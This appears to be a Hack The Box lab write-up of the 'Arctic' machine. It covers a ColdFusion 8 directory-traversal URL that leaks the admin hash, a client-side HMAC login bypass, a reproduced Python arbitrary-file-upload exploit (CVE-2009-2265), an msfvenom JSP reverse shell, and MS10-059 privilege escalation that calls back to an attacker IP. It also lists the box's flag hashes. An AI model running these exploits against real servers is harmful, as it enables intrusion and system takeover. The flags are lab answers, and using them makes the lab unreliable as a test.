Windows Boxes

Arctic

  1. nmap
  2. enumeration
    1. /CFIDE
      1. /administrator
  3. intitial foothold
    1. with metasploit
      1. localhost proxy listener
      2. fckeditor reverseshell
    2. w/o metasploit
      1. searchsploit
      2. directory traversal (LFI)
        1. admin pass
          1. Crackstation
        2. pagesource
        3. webpage console
          1. admin
      3. reverse shell through file upload
        1. scheduling a task
      4. arrexel reverse shell
        1. arbitrary file upload by arrexel
          1. exploit
          2. vi arrexel_exploit.py
          3. jsp generated payload w/ msfvenom
          4. run
  4. privesc
    1. windows exploit suggester
      1. sysinfo
      2. report
    2. ms10-059 -> chimichurri
      1. upload with arrexel's file uploader
      2. run
  5. user/root
  6. Lessons Learned

Arctic

images/45-1.png
images/45-2.png

nmap

images/46-1.png
Making note of the services running:
Ports 135 & 49154: running Microsoft Windows RPC. (SMB)
Port 8500: possibly running Flight Message Transfer Protocol (FMTP).

enumeration

lets start off our enumeration phase by visiting port 8500
images/727-1.png

/CFIDE

images/729-1.png

images/729-2.png is an interesting directory, lets navigate to that first

/administrator

we see we get a login page images/730-1.png is the version of coldfusion the server is running, lets see if theres anything searchsploit has on it...

images/730-2.png

intitial foothold

images/734-1.png
Lets fire up searchsploit for Coldfusion 8 vulns
images/734-2.png

After reviewing the exploits, two of them stand out:
14641 Directory Traversal. We’ll use that to get the password of the administrator.
45979Arbitrary file Upload. We’ll use that to get a reverse shell on the target machine.

with metasploit

localhost proxy listener
fckeditor reverseshell

localhost proxy listener

First set up a proxy listener in burp so we can capture the packets of our coldfusion exploit as we launch it

images/49-1.png

fckeditor reverseshell

images/47-1.png

run the exploit to catch the request through burpsuite and send to repeater
images/47-2.png

we see our exploit successfully uploaded our reverse shell and saved it in the directory /userfiles/file/YI.jsp, we can navigate to that URL in our browser to run it
images/47-3.png
images/47-4.png

when we navigate to the jsp file we uploaded we run our reverse shell
images/47-5.png



w/o metasploit

searchsploit
directory traversal LFI

searchsploit

searchsploit adobe coldfusion version 8 and see what comes up:

we're only interested in version 8 and before...
images/732-1.png

After reviewing the exploits, two of them stand out:
14641Directory Traversal. We’ll use that to get the password of the administrator.
45979 Arbitrary file Upload. We’ll use that to get a reverse shell on the target machine.

directory traversal (LFI)

Lets take a look at the directory traversal exploit and see how it works:

images/733-1.png

we don't need to run the exploit, we can plug the directory traversal url into our browser
images/733-2.png

to this url
images/733-3.png
or http://10.10.10.11:8500/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en for the arctic box


there are additional notes from the sourcecode in case we run into blocked directories:
images/733-4.png

admin pass

the password images/735-1.png is outputted onto the screen!

2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03
images/735-2.png

Crackstation

we can also use crackstation to uncover the hash:
images/738-1.png
happyday is our password BUT it will not work as the admin page only takes the salted hash

pagesource

Right click on the page and select View Page Source. There, we find three pieces of important information on the steps taken to send the password to the backend.

1) The password is taken from the password field and hashed using SHA1. This is done on the client side.
2) Then the hashed password is HMAC-ed using a salt value taken from the parameter salt field. This is also done on the client side.
3) The HMAC-ed password gets sent to the server with the salt value. There, I’m assuming the server verifies that the hashed password was HMAC-ed with the correct salt value.

images/736-1.png

the password images/736-2.png is a hash of the real password

Therefore, instead of cracking the password (which can take a long time!) we can calculate the cfadminPassword.value and use an intercepting proxy to bypass the client side calculation.

webpage console

To quickly calculate the cfadminPassword value use the Console in your browser Developer Tools to run the following JS code.

console.log(hex_hmac_sha1(document.loginform.salt.value, ‘2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'’))
images/737-1.png
images/737-2.png
now lets intercept the login packet with burpsuite and plug this value into cfadminPassword:

Note: we only have a 30-second window to enter this hash before the salt updates so be quick! If you miss the timing you can generate the new salted hash either way and keep trying
images/737-3.png

admin

a few botched attempts and regenerated hashes and WE'RE IN!

images/739-1.png

reverse shell through file upload

If we take a look at the admin capabilities, under the debugging and logging tab we can see we have the ability to schedule a task to be run, lets take a closer look at this

images/740-1.png

scheduling a task

images/741-1.png
from here upload our msfvenom jsp reverse shell and schedule it to run as often as possible, then set up a listener and connect back

To be continued...use arrexel's reverse shell for now

arrexel reverse shell

A fellow hacker and htb enthusist named arrexel also uploaded an arbitrary file upload in his arctic writeup also, I want to use his exploit to gain a foothold on the box as well

arbitrary file upload by arrexel

images/742-1.png
images/742-2.png
images/742-3.png

exploit

#!/usr/bin/python
# Exploit Title: ColdFusion 8.0.1 - Arbitrary File Upload
# Date: 2017-10-16
# Exploit Author: Alexander Reid
# Vendor Homepage: http://www.adobe.com/products/coldfusion-family.html


# Version: ColdFusion 8.0.1
# CVE: CVE-2009-2265
#
# Description:
# A standalone proof of concept that demonstrates an arbitrary file upload vulnerability in ColdFusion 8.0.1
# Uploads the specified jsp file to the remote server.
#
# Usage: ./exploit.py <target ip> <target port> [/path/to/coldfusion] </path/to/payload.jsp>
# Example: ./exploit.py 127.0.0.1 8500 /home/arrexel/shell.jsp
import requests, sys

try:
ip = sys.argv[1]
port = sys.argv[2]
if len(sys.argv) == 5:
path = sys.argv[3]
with open(sys.argv[4], 'r') as payload:
body=payload.read()
else:
path = ""
with open(sys.argv[3], 'r') as payload:
body=payload.read()
except IndexError:
print 'Usage: ./exploit.py <target ip/hostname> <target port> [/path/to/coldfusion] </path/to/payload.jsp>'
print 'Example: ./exploit.py example.com 8500 /home/arrexel/shell.jsp'
sys.exit(-1)

basepath = "

http://"

+ ip + ":" + port + path

print 'Sending payload...'

try:
req = requests.post(basepath + "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm?Command=FileUpload&Type=File&CurrentFolder=/exploit.jsp%00", files={'newfile': ('exploit.txt', body, 'application/x-java-archive')}, timeout=30)
if req.status_code == 200:
print 'Successfully uploaded payload!\nFind it at ' + basepath + '/userfiles/file/exploit.jsp'
else:
print 'Failed to upload payload... ' + str(req.status_code) + ' ' + req.reason
except requests.Timeout:
print 'Failed to upload payload... Request timed out'

vi arrexel_exploit.py

Copy and paste arrexel's code into a vi file we create and give it execute permissions:

images/746-1.png
images/746-2.png
images/746-3.png


jsp generated payload w/ msfvenom

we'll use the /java/jsp_shell_reverse_tcp payload to connect back to our attacking machine

images/744-1.png

run

usage: images/747-1.png

so we'll use python arrexel_exploit.py 10.10.10.11:8500 shell.jsp and set up a listener

images/747-2.png

lets navigate to the URL specified and...

images/747-3.png

images/747-4.png
images/747-5.png

privesc

windows exploit suggester
ms01-059 -> chimichurri

windows exploit suggester

to run windows exploit suggester on our box, we have to first get the system info and copy it to a file on our attack machine

first lets update the database
images/751-1.png

copy the box's systeminfo from our reverse shell and save it into a sysinfo text file
images/751-2.png

now run the suggester with the updated database file and the sysinfo txt file
images/751-3.png

images/751-4.pngoof, have to update the xlrd library, lets do that

pip install xlrd
images/751-5.png

lets try again... success!
images/751-6.png

sysinfo

save this to our sysinfo textfile:

images/749-1.png

report

./windows-exploit-suggester.py --database 2020-05-28-mssb.xls --systeminfo /root/Documents/htb/boxes/arctic/sysinfo

images/752-1.png

ms10-059 -> chimichurri

a bunch of exploits work here but lets try one I know works

images/753-1.png
save it and move it to our working directory

images/753-2.png
images/753-3.png


images/753-4.png
images/753-5.png

upload with arrexel's file uploader

first we need to update arrexel's exploit to handle exe files instead of jsp

images/754-1.png
to:
images/754-2.png


lets run it again
python arrexel_exploit_exe.py 10.10.10.11 8500 MS10-059.exe
images/754-3.png

it uploads to the following directory on arctic:
cd C:\ColdFusion8\wwwroot\userfiles\file


run

Finally, lets run the privesc program from our initial foothold

images/755-1.png
run chimichurri (exploit.exe) and have it point back to our attacking machine

exploit.exe 10.10.14.62 6666
images/755-2.png

look back to our listener and ...
images/755-3.png
we are nt authority\system!

user/root

images/748-1.png
02650d3a69a70780c302e146a6cb96f3

images/748-2.png
ce65ceee66b2b5ebaff07e50508ffb90

Lessons Learned

Check out Rana Khalil's OSCP writeups and prep at https://rana-khalil.gitbook.io/hack-the-box-oscp-preparation/
images/1450-1.png